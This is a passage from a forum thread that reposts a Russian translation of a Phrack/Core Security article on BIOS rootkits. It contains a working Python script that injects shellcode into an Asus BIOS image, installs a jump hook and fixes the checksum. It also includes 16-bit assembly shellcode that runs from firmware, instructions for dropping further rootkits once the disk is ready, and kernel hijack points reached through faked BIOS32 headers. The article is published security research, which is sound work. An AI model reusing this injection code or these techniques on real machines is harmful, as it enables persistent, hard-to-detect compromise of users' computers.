    	        print "Usage: %s <original bios> <assembly shellcode 
    		file>" % (sys.argv[0])
            	exit(0)
    
    	# assembly the file
    	scasm = sys.argv[2]
    	sccom = "%s.bin" % scasm
    	os.system("nasm %s -o %s " % (scasm,sccom) )
    	shellcode = open(sccom,'rb').read()
    	shellcode = shellcode[0xb55:] # skip the NOPs
    	os.unlink(sccom)
    	print ("Shellcode lenght: %d" % len(shellcode))
    
    	# Make a copy of the original BIOS
    	modifname = "%s.modif" % sys.argv[1]
    	origname = sys.argv[1]
    	os.system("cp %s %s" % (origname,modifname) )
    
    	#merge shellcode with original flash
    	insertposition = 0x3af75
    	modif = open(modifname,'rb').read()
    	os.unlink(modifname)
    	newbios=modif[:insertposition]
    	newbios+=shellcode
    	newbios+=modif[insertposition+len(shellcode):]
    	modif=newbios
    	#insert hook
    	hookposition = 0x3a41d
    	hook="\xe9\x55\x0b" # here is our hook,
    			    # at the end of the bootblock
    	newbios=modif[:hookposition]
    	newbios+=hook
    	newbios+=modif[hookposition+len(hook):]
    	modif=newbios
    
    	#read original flash
    	orig  = open(sys.argv[1],'rb').read()
    	
    	# calculate original and modified checksum
    	# Sorry, this script is not *that* generic
    	# you will have to harvest these values
    	# manually, but you can craft an automatic
    	# one using pattern search. 
    	# These offsets are for the Asus A7V8X-MX
    	# Revision 1007-001
    	
    	start_of_decomp_blk=0x3a400
    	start_of_compensation=0x3affc
    	end_of_decomp_blk=0x3b000
    	
    	ochksum=0 # original checksum
    	mchksum=0 # modified checksum
    	
    	for i in range(start_of_decomp_blk,start_of_compensation):
    		ochksum+=ord(orig[i])
    		mchksum+=ord(modif[i])
    	print "Checksums: Original= %08X Modified= %08X" % (ochksum,mchksum)
    	
    	# calculate difference
    
    	chkdiff = (mchksum & 0xff) - (ochksum & 0xff)
    
    	print "Diff : %08X" % chkdiff
    	
    	# balance the checksum
    	newbios=modif[:start_of_compensation]
    	newbios+=chr( (0x1FF-chkdiff) & 0xff )
    	newbios+=modif[start_of_compensation+1:]
    	
    	mchksum=0 # modified checksum
    	ochksum=0 # modified checksum
    	for i in range(start_of_decomp_blk,end_of_decomp_blk):
    		ochksum+=ord(orig[i])
    		mchksum+=ord(newbios[i])
    	print "Checksum: Original = %08X Final= %08X" % (ochksum,mchksum)
    	print "(Please check the last digit, must be the same in both checkums)"
    	
    	
    	newbiosname=sys.argv[2]+".compensated"
    	w=open(newbiosname,'wb')
    	w.write(newbios)
    	w.close()
    	print "New bios saved as %s" % newbiosname
    	
    	-------------------------------------------------------------
    С помощью этой техники мы успешно изменяем один бит, один байт и несколько байт на несжатой области BIOS. Первый шаг сделан.


    ---[3.2.2.1 - Внедрение кода

    Вредоносный код находится все в том же месте: блок декомпрессора. Мы также переходим на то же место, что и в инъекции кода VMware: в конце блока декомпрессора в целом было достаточно места для того чтобы сделать довольно приличный первый шеллкод. Подсказка: при поиске "= Award Decompression Bios =" в BIOS Phoenix, имеем блок с пометкой "DECOMPCODE" (с использованием phnxdeco или любого другого инструмента). Техника почти никогда не меняется. Есть несколько пунктов, которые ты должен сделать, чтобы убедиться, что подключился правильно. Во-первых, включить основной вредоносный код, который перебрасывает вперед, а затем возвращает. Задем изменить его, чтобы привести к бесконечному циклу (у нас нет отладчика, поэтому мы должны использовать эту ужасную технику). Если ты можешь контролировать правильную загрузку компьютера и его блокировку, Graz! Теперь у тебя есть код, скрыто выполняющийся из BIOS.


    ---[3.2.3 - Подгрузка

    Теперь у нас есть контроль над BIOS. Ты откапываешь в своей голове навык 16-битного шеллкодинга и пытаешься заюзать 10h INT для вывода "I Pwned J00!" на экран, а затем приступить к использованию INT 13h, чтобы писать на жесткий диск. Не беги вперед паровоза, иначе тебя поглотит черный экран эпик фэйла. Это потому, что у тебя все еще нет полного контроля над BIOS. Для начала впомни, как мы это делали с кодом на VMware: мы исполняли код несколько раз во время процесса загрузки. В первый момент времени диск не вращается, экран по-прежнему выключен и, что самое удивительное, прерывание векторной таблицы не инициализировано. Звучит круто, но на самом деле это большая проблема. Ты не можешь производить запись на диск, если он не вращается, но ты можешь использовать прерывание, если IVT не инициализирован. Тебе следует подождать. Но как мы узнаем, когда для подойдет время для выполнения? Нам опять потребуется некий ready-to-go signal (сигнал готовности).


    ---[3.2.3.1 - Сигнал готовности

    В VMware, мы использовали содержание IVT как сигнал готовности. Шеллкод проверял, готов ли IVT, путем получения от него правильных значений. Это было очень легко, потому что в реальном режиме IVT всегда находится на ожном и том же месте (0000:0000 легко запомнить, кстати). Этот метод - полный отстой, потому что реально ты из этого больше ничего не извлечешь.

    Указатели на IVT все время отличаются, даже между версиями одного и того же производителя BIOS. Нам необходима лучшая, превосходящая "работу-на-другом-компьютере-отличном-от-моего" техника. Короче говоря, вот решение, и оно прекрасно работает:

    Code:
    Проверьте содержит ли C000:0000 подпись AA55h.
    Если условие истинно, то ты можешь выполнять любые перерывания. Суть в том, что в этом точном положении VGA BIOS загружается на всех ПК. И AA55h это подпись, которая говорит нам, что VGA BIOS существует. Это прекрасно для точного определения, был ли загружен VGA BIOS, а затем инициализирован IVT. Предупреждение: Конечно, жесткий диск еще не вращается! Но теперь ты можешь проверить его без сбоев прерыванием 13h, используя функцию 41h для проверки расширения LBA, а затем сделать сброс диск с помощью функции 00h. Пример представлен в разделе 3.1.5.1

    Остальное уже история. Ты можешь использовать INT 13h с LBA для проверки готовности диска, и если он готов, то вставить disk-stage rootkit или SMBIOS руткит (см. [PHRACK65]), или BluePill, или I-Love-You вирус, да и вообще, что тебе угодно. Твой код теперь бессмертен.

    Кстати, вот второй шеллкод:

    Code:
    -------------------------------------------------------------
    	;skull.asm please use nasm to assemble
    	BITS 16
    	back:
    	        TIMES 0x0b55 db 0x90
    
    	begin2:
    	        pusha
    	        pushf
    		push es
    		push ds
    
    		push 0xc000
    	        pop ds
    		cmp word [0],0xaa55
    		je print
    	
    	volver:
    		pop ds
    		pop es
    	        popf
    	        popa
    	        pushad
    	        push cx
    	        jmp back
    	
    	print:
    	        jmp start
    	
    	        ;message
    	        ;   123456789
    	msg:    db ' .---.',13,10,\
    	           '/     \',13,10,\
    	           '|(\ /)|',13,10,\
    	           '(_ o _)',13,10,\
    	           ' |===|',13,10,\
    	           ' `-.-`',13,10
    	        times 55-$+msg db ' '
    	
    	start:
    	        ;geteip
    	        call getip
    	getip:
    	        pop dx
    	
    	        ;init video
    	        mov ax,0003
    	        int 0x10
    	
    	        ;video write
    	        mov bp,dx
    	        sub bp,58 ; message
    	
    	        ;write string
    	        mov ax,0x1300
    	        mov bx,0x0007
    	        mov cx,53
    	        mov dx,0x0400
    	        push cs
    	        pop es
    	        int 0x10
    	
    	        call sleep
    	        jmp volver
    	
    	sleep:
    	        mov cx, 0xfff
    	l1:
    	        push cx
    	        mov cx,0xffff
    	l2:
    	        loop l2
    	        pop cx
    	        loop l1
    	        ret
    	-------------------------------------------------------------
     
  3. Delivery Man

    Delivery Man New Member

    Joined:
    2 Jul 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ------[ 4.- BIOS32 (Прямая инфекция ядра)

    Теперь у тебя есть BIOS руткит, который выполняется в BIOS. Но находясь в BIOS, он просто сосет с точки зрения атакующего. В идеале нам нужен контроль над ядром операционной системы. Вот почему ты должен аплоаднуть шеллкод на жесткий диск или сделать SMBIOS-руткит. Но что делать, если жесткий диск зашифрован? Или если машина не имеет жесткого диска и грузится по сети? Не ссы, потому что этот раздел именно для таких случаев. Есть заблуждение, что BIOS не используется после загрузки. Это неправда. ОС обращается к BIOS по многим причинам, как, например, установка видеорежимов (Int 10h) или вызов BIOS-32. Что такое BIOS32? Используя поиск Google, мы пришли к выводу, что это скрытая служба BIOS, которая предоставляет информацию о других сервисах BIOS современным 32-разрядным операционным системам. Вы можете обратиться к [BIOS32SDP] для получения более детальной информации. Важно то, что многие операционные системы обращаются к нему. И единственным требованием, чтобы подменить службу BIOS32, является то, что Вам необходимо сделать заголовок BIOS32 где-то от E000:0000 до F000:FFFF области памяти. Структура заголовка:

    Code:
    Offset	Bytes	Description
    0	4	Signature "_32_"
    4	4	Entry point for the BIOS32 Service (here you put a pointer
    		to your stuff)
    8	1	Revision level, put 0
    9	1	Length of the BIOS32 Headers in paragraphs (put 1)
    10	1	8-bit Checksum. Security FTW!
    11	5	Reserved, put 0s.

    Это шаблон для всех сервисов BIOS. Чтобы найти и выполнить сервис, нужно выполнить шаблонный поиск по контрольной сумме, а затем он просто переходит на функцию, которая является своего рода диспетчером. Такое поведение присутствует в различных BIOS функциях, такие как Plug и Play ($PnP), Post Memory Manager ($PMM), BIOS32 (_32_) и т. д. В то время, когда система была разработана, безопасность не учитывалась, поэтому мы можем использовать это преимущество и вставить наши собственные заголовки (мы можем даже использовать option-ROM, без изменения системы BIOS), ну и ОС, в конечном счете, всегда доверяет BIOS. Вот как Linux 2.6.27 находит и вызывает эту услугу на этапе ядра:

    Code:
    arch/x86/pci/pcibios.c,check_pcibios()
    ...
    	if ((pcibios_entry = bios32_service(PCI_SERVICE))) {
    		pci_indirect.address = pcibios_entry + PAGE_OFFSET;
    
    		local_irq_save(flags);
    		__asm__(
    			"lcall *(%%edi); cld\n\t"  <--- Pwn point
    			"jc 1f\n\t"
    			"xor %%ah, %%ah\n"
    			"1:"
    ...
    
    OpenBSD 4.5 does the same here:
    
    sys/arch/i386/i386/bios.c,bios32_service()
    int
    bios32_service(u_int32_t service, bios32_entry_t e, bios32_entry_info_t ei)
    {
    ...
    	base = 0;
    	__asm __volatile("lcall *(%4)"         <-- Pwn point
    	    : "+a" (service), "+b" (base), "=c" (count), "=d" (off)
    	    : "D" (&bios32_entry)
    	    : "%esi", "cc", "memory");
    ...
    На данный момент у нас нет никаких данных о прямых вызовах в Windows XP/Vista/7 BIOS32 , но можешь обратиться к презентации [JHeasman], где представлены документы прямого Int 10h вызова из нескольких точек на ядро Windows.

    Фейк заголовка BIOS32 или изменение существующего является реальным способом сделать прямые бинарные операции выполнения на уровне ядра, и удобнее, чем вызов INT 10 (нам не нужно переключатся в защищенный режим). К сожалению, из-за нехватки времени, мы не могли осветить BIOS32 inj vector PoC, но она должна быть относительно легкой при реализации. Теперь у тебя есть все инструменты, чтобы потестировать эти дела безопасно внутри виртуальной машины, такой как VMware.

    Далее идет заключение от автора, его благодарности и список литературы. Так как он не несет основной смысловой нагрузки, оставляю его в первозданном виде. Заранее прошу прощения за мой французский. Спасибо за внимание, рад был поработать над данной статьей.

    Code:
    ------[ 5.- Future and other uses
    
    Bios modification is a powerful attack technique. As we said before,
    if you take control of the system at such an early stage, there is
    very little that an anti-virus or detection tool can do. Furthermore,
    we can stay resident using a common boot-sector rootkit, or file
    system modification.  But some of the more fun things that you can do
    with this attack is to drop a more sophisticated rootkit, like a
    virtualized one, or better, a SMM Rootkit.
    
    ---[5.1 - SMM!
      
    The difficulty of SMM Rootkits relies on the fact that you can't 
    touch the SMRAM once the system is booted, because the BIOS sets
    the D_LCK bit [PHRACK65].  Recently many techniques has been
    developed to overcome this lock, like [DUFLOTSM], but if you are
    executing in BIOS, this lock doesn't affect you, because you are
    executing before this protection, and you could modify the SMRAM
    directly on the firmware. However, this	technique would be very 
    difficult and not generic at all, but it's doable.
    
    ---[5.2 - Signed firmware
    	
    The huge security hole that is allowing unsigned firmware into
    a motherboard is being slowly patched and many signed BIOS
    systems are being deployed, see [JHeasman2] for examples.
    This gives you an additional layer of security and prevent
    exactly the kind of attack proposed in this article.
    However, no system is completely secure, bug and backdoors
    will always exist. To this date no persistent attack on
    signed bios has been made public, but researchers are
    close to beating this kind of protections, see for example 
    [ILTXT].
    	
    ---[5.3 - Last words
    	
    Few software is so fundamental and at the same time, so closed,
    as the BIOS. UEFI [UEFIORG], the new firmware interface, promises 
    open-standards and improved security.
    But meanwhile, we need more people looking, reversing and 
    understanding this crucial piece of software. 
    It has bugs, it can contain malicious code, and most importantly,
    BIOS can have complete control of your computer. Years ago people
    regained part of that control with the open-source revolution, but
    users won't have complete control until they know what's lurking
    behind closed-source firmware.
    If you want to improve or start researching your own BIOS and
    need more resources, an excellent place to start would be
    the WIM'S BIOS High-Tech Forum [WBHTF], where very low-level
    technical discussions take place.
    	
    
    --[6.- Greetz
      
    We would like to thank all the people at Core Security for giving us
    the space and resources to work in this project, in particular to the
    whole CORE's Exploit writers team for supporting us during the time we
    spent researching this interesting stuff.
    	
    Kudos to the phrack editor team that put a huge effort into this 
    e-zine.
    
    To t0p0, for inspiring us in this project with his l33t cisco stuff.
    To Gera for his technical review.  To Lea & ^Dan^ for correctin our
    englis.  And Laura for supporting me (Alfred) on my long nights of
    bios-related suffering. 
    	
    	
    ---[7.- References
    
    [JHeasman] Firmware Rootkits, The Threat to the Enterprise,
    	   John Heasman, http://www.ngssoftware.com/research/
    	   papers/BH-DC-07-Heasman.pdf
    [JHeasman2] Implementing and detecting ACPI BIOS rootkit,
    	    http://www.blackhat.com/presentations/bh-federal-06/
    	    BH-Fed-06-Heasman.pdf 
    [BIOS32SDP] Standard BIOS 32-bit Service Directory Proposal 0.4,
    	    Thomas C. Block, http://www.phoenix.com/NR/rdonlyres/
                ECF22CEC-A1B2-4F38-A7F9-629B49E1DCAB/0/specsbios32sd.pdf
    [COREBOOT] Coreboot project, Flashrom utility, http://www.coreboot.org/
    	   Flashrom
    [PHRACK65] Phrack Magazine, Issue 65, http://www.phrack.com/
    	   issues.html?issue=65
    [DUFLOTSM] "Using CPU System Management Mode to Circumvent 
    	   Operating System Security Functions" Loic Duflot, 
    	   Daniel Etiemble, Olivier Grumelard Proceedings of 
    	   CanSecWest, 2006 
    [UEFIORG]  Unified EFI Forum, http://www.uefi.org/
    [ILTXT]	   Attacking Intel Trusted Execution Technology,
    	   BlackHat DC, Feb 2009. 
    	   http://invisiblethingslab.com/resources/
    	   bh09dc/Attacking%20Intel%20TXT%20-%20paper.pdf
    [WBHTF]    WIM'S BIOS In-depth High-tech BIOS section
    	   http://www.wimsbios.com/phpBB2/
    	   in-depth-high-tech-bios-section-vf37.html
    [LZH]      http://en.wikipedia.org/wiki/LHA_(file_format)
    [Pinczakko] Pinczakko Official Website, 
                http://www.geocities.com/mamanzip/
    
    © .aLS - anibal.sacco@coresecurity.com
    Alfredo - alfredo@coresecurity.com

    © Translated by Ex0rcist a.k.a. Heroin from GR TeaM
    © Resident of r0 Crew


    Желающие участвовать в переводах статей, схожей тематики, могут обратиться на форумы команд GR TeaM & r0 Crew
     
    #3 Delivery Man, 22 Oct 2010
    Last edited: 22 Oct 2010
Loading...